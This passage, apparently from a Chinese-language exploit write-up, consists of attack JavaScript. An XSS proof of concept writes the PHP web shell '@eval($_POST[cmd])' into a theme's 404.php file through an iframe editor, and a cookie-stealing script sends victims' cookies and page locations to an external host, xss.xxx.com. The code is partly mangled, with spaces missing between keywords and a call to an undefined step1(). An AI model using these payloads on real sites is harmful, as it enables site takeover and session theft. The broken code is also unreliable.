var times=0; var g_shell=0; functionpoc() { if (times <= 10) { var htmldata = document.getElementById("testxss").contentWindow.document.getElementById("content"); var btn = document.getElementById("testxss").contentWindow.document.getElementsByTagName("button"); olddatas = htmldata.innerText; htmldata.innerText = "<?php @eval($_POST[cmd])?>\n" + olddatas; btn[1].click(); times += 1; if (g_shell == 1) { var xhr1 = newXMLHttpRequest(); xhr1.open("get", "/usr/themes/default/404.php?shell=1"); xhr1.send(); } else { return0; } } }
step1();
访问发现一句话木马已经被写入 404.php 文件
获取 Cookie 脚本
1 2
var website="http://xss.xxx.com"; (function(){(newImage()).src=website+'/?keepsession=1&location='+escape((function(){try{returndocument.location.href}catch(e){return''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+'&cookie='+escape((function(){try{returndocument.cookie}catch(e){return''}})())+'&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();